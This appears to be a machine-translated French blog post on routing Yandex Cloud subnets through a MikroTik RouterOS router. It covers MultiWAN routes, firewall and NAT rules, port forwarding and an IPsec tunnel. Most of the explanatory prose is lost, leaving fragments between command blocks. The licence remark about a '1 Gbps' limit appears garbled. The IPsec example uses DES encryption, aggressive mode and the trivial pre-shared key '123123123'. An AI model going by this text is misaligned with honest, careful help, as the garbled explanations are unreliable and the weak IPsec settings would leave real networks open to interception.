Cloud Yandex et MikroTik MultiWAN

Salutations lecteurs, dans cet article, je voudrais partager mon expérience de la mise en place d'un réseau cloud interne Yandex et du routage vers Internet via RouterOS MikroTik.



Il y en a un VPCqui est administré par des services internes et distribue des ipVM internes externes via une passerelle de sous-réseau derrière NAT'th, ce qui n'est pas très pratique pour une administration centralisée.



Le schéma du réseau interne et l'obtention du réseau externe ipdans le cloud Yandex ressemble à ceci:





ip NAT-instance forward, . / ( VPC Preview).



, IP VPC1





, :





.



:



Internal1-a – 10.1.0.0/24
Internal2-a – 10.1.1.0/24
Internal1-b – 10.1.2.0/24
Internal2-b – 10.1.3.0/24
Internal1-c – 10.1.4.0/24
Internal2-c – 10.1.5.0/24


, . . ip



Gateway – X.X.X.1
Internal DNS – X.X.X.2


RouterOS.



Cloud Marketplace -> -> Cloud Hosted Router ip



RouterOS
Ether1 – 10.1.0.254
Ether2 – 10.1.1.254


ether1 winbox. , admin rsa public key.



CLI. winbox, , ip route ..



,



/ip route print 
Flags: X - disabled, A - active, D - dynamic, C - connect, S - static, r - rip,
 b - bgp, o - ospf, m - mme, B - blackhole, U - unreachable, P - prohibit 
 #      DST-ADDRESS        PREF-SRC        GATEWAY            DISTANCE
 0 ADS  0.0.0.0/0                          10.1.0.1                  1
 1 ADC  10.1.1.0/24        10.1.1.254      ether2                    0
 2 ADC  10.1.0.0/24        10.1.0.254      ether1                    0


ether1 10.1.0.1 NAT . ip , .



2 , 2 , distance .





/ip route
add dst-address=0.0.0.0/0 gateway=10.1.1.1 distance=2 
add dst-address=10.1.2.0/24 gateway=10.1.0.1 distance=1  
add dst-address=10.1.3.0/24 gateway=10.1.1.1 distance=1  
add dst-address=10.1.5.0/24 gateway=10.1.1.1 distance=1  
add dst-address=10.1.4.0/24 gateway=10.1.0.1 distance=1 


b c a.



firewall.





/ip firewall filter
add chain=input action=accept src-address=10.1.5.0/24 
add chain=input action=accept src-address=10.1.1.0/24 
add chain=input action=accept src-address=10.1.3.0/24 
add chain=input action=accept src-address=10.1.2.0/24 
add chain=input action=accept src-address=10.1.0.0/24 
add chain=input action=accept src-address=10.1.4.0/24 


ping



/ip firewall filter
add chain=input action=accept protocol=icmp 




/ip firewall filter
add chain=forward action=accept src-address=10.1.5.0/24 \
dst-address=0.0.0.0/0 
add chain=forward action=accept src-address=10.1.1.0/24 \
dst-address=0.0.0.0/0 
add chain=forward action=accept src-address=10.1.3.0/24 \
dst-address=0.0.0.0/0 
add chain=forward action=accept src-address=10.1.2.0/24 \
dst-address=0.0.0.0/0 
add chain=forward action=accept src-address=10.1.0.0/24 \
dst-address=0.0.0.0/0 
add chain=forward action=accept src-address=10.1.4.0/24 \
dst-address=0.0.0.0/0 




/ip firewall filter add chain=input action=drop log=no




/ip firewall filter move numbers="[old rule no]" \
destination="[new rule no]"




/ip firewall filter print


ip , MultiWAN. MULTIWAN ( )



WAN , route rules, 2 interface list



/interface list
add name="WAN1"
add name="WAN2"

/interface list member
add list=WAN1 interface=ether1 dynamic=no 
add list=WAN2 interface=ether2 dynamic=no




/ip route
add dst-address=0.0.0.0/0 gateway=10.1.0.1 distance=1 routing-mark=WAN1 
add dst-address=0.0.0.0/0 gateway=10.1.1.1 distance=1 routing-mark=WAN2 


, ether1, ,





/ip route rule
add src-address=10.1.0.0/16 dst-address=10.1.0.0/16 action=lookup-only-in-table table=main
add src-address=10.1.3.0/24 action=lookup-only-in-table table=WAN2 
add src-address=10.1.5.0/24 action=lookup-only-in-table table=WAN2


2 ip , .



:

Virtual Private Cloud -> -> NAT -> -> , -> : 0.0.0.0/0, Next hop: 10.1.0.1/10.1.1.1 -> .

( api kubernetes) ipsec, 2



 : 10.1.0.0/16, Next hop: 10.1.0.1/10.1.1.1
 : <_>, Next hop: 10.1.0.1/10.1.1.1


, , IP , srcnat . masquerade



/ip firewall nat
add chain=srcnat action=accept src-address=10.1.0.0/16 dst-address=10.1.0.0/16
add chain=srcnat action=masquerade src-address=10.1.0.0/24 dst-address=0.0.0.0/0 
add chain=srcnat action=masquerade src-address=10.1.1.0/24 dst-address=0.0.0.0/0 
add chain=srcnat action=masquerade src-address=10.1.2.0/24 dst-address=0.0.0.0/0 
add chain=srcnat action=masquerade src-address=10.1.3.0/24 dst-address=0.0.0.0/0 
add chain=srcnat action=masquerade src-address=10.1.4.0/24 dst-address=0.0.0.0/0 
add chain=srcnat action=masquerade src-address=10.1.5.0/24 dst-address=0.0.0.0/0


ip . .



:





// ip :



/ip firewall nat
add chain=dstnat action=netmap to-addresses=10.1.5.20 \
to-ports=10050 protocol=tcp src-address=7.7.7.1 in-interface-list=WAN2 port=10055 
add chain=dstnat action=netmap to-addresses=10.1.0.5 \
to-ports=3306 protocol=tcp src-address=7.7.7.2 in-interface-list=WAN1 port=11050


7.7.7.1/7.7.7.2 ip .



, ipsec, , .



: ipsec



, ipsec ip



, psk, . . ip NAT, peer mikrotik, identity IP



/ip ipsec profile
add name="office" hash-algorithm=sha512 enc-algorithm=des dh-group=modp1536 \
lifetime=8h proposal-check=obey nat-traversal=no \
dpd-interval=2m dpd-maximum-failures=5

/ip ipsec peer
add  name="peer_office" address=9.9.9.1/32 local-address=10.1.1.0 \
profile=office exchange-mode=aggressive send-initial-contact=yes

/ip ipsec identity
add peer=peer_office auth-method=pre-shared-key notrack-chain="prerouting" \
secret="123123123" generate-policy=no policy-template-group=office \
my-id=address:<cloud_ext_ip_address>

/ip ipsec proposal
add name="office" auth-algorithms=sha256 \
enc-algorithms=des lifetime=1h pfs-group=modp1536




/ip ipsec policy 
add peer=peer_office tunnel=yes src-address=10.1.0.0/16 src-port=any \
dst-address=10.7.0.0/16 \
dst-port=any protocol=all action=encrypt level=require ipsec-protocols=esp \
sa-src-address=10.1.1.254 sa-dst-address=9.9.9.1 proposal=office


, peer level unique, 12.1.0.0/24 12.10.0.0/24



/ip ipsec policy 
add peer=peer_office tunnel=yes src-address=10.1.0.0/16 src-port=any \
dst-address=12.1.0.0/24 \
dst-port=any protocol=all action=encrypt level=unique ipsec-protocols=esp \
sa-src-address=10.1.1.254 sa-dst-address=9.9.9.1 proposal=office

add peer=peer_office tunnel=yes src-address=10.1.0.0/16 src-port=any \
dst-address=12.10.0.0/24 \
dst-port=any protocol=all action=encrypt level=unique ipsec-protocols=esp \
sa-src-address=10.1.1.254 sa-dst-address=9.9.9.1 proposal=office


firewallfillter rules, NAT, raw, NAT



/ip firewall filter 
add chain=input action=accept src-address=10.7.0.0/16 
add chain=input action=accept protocol=ipsec-esp src-address=9.9.9.1 
add chain=input action=accept protocol=udp src-address=9.9.9.1 port=500 
add chain=forward action=accept src-address=10.7.0.0/16 dst-address=10.1.0.0/16 
add chain=forward action=accept src-address=10.1.0.0/16 dst-address=10.7.0.0/16 

/ip firewall nat 
add chain=srcnat action=accept src-address=10.1.0.0/16 dst-address=10.7.0.0/16 
add chain=srcnat action=accept src-address=10.7.0.0/16 dst-address=10.1.0.0/16 

/ip firewall raw  
add chain=prerouting action=accept src-address=10.1.0.0/16 dst-address=10.7.0.0/16 
add chain=prerouting action=accept src-address=10.7.0.0/16 dst-address=10.1.0.0/16


10.7.0.0/16 — , 9.9.9.1ip



.



Une licence MikroTik RouterOSdoit être achetée pour, sinon la vitesse du port sera de 1 Gbps et les restrictions fonctionnelles

https://wiki.mikrotik.com/wiki/Manual:License



Merci de votre attention!



Sources utilisées:



MULTIWAN



UPD

Basé sur les commentaires et remarques, a ajouté l'article, a ajouté une descriptionipsec




All Articles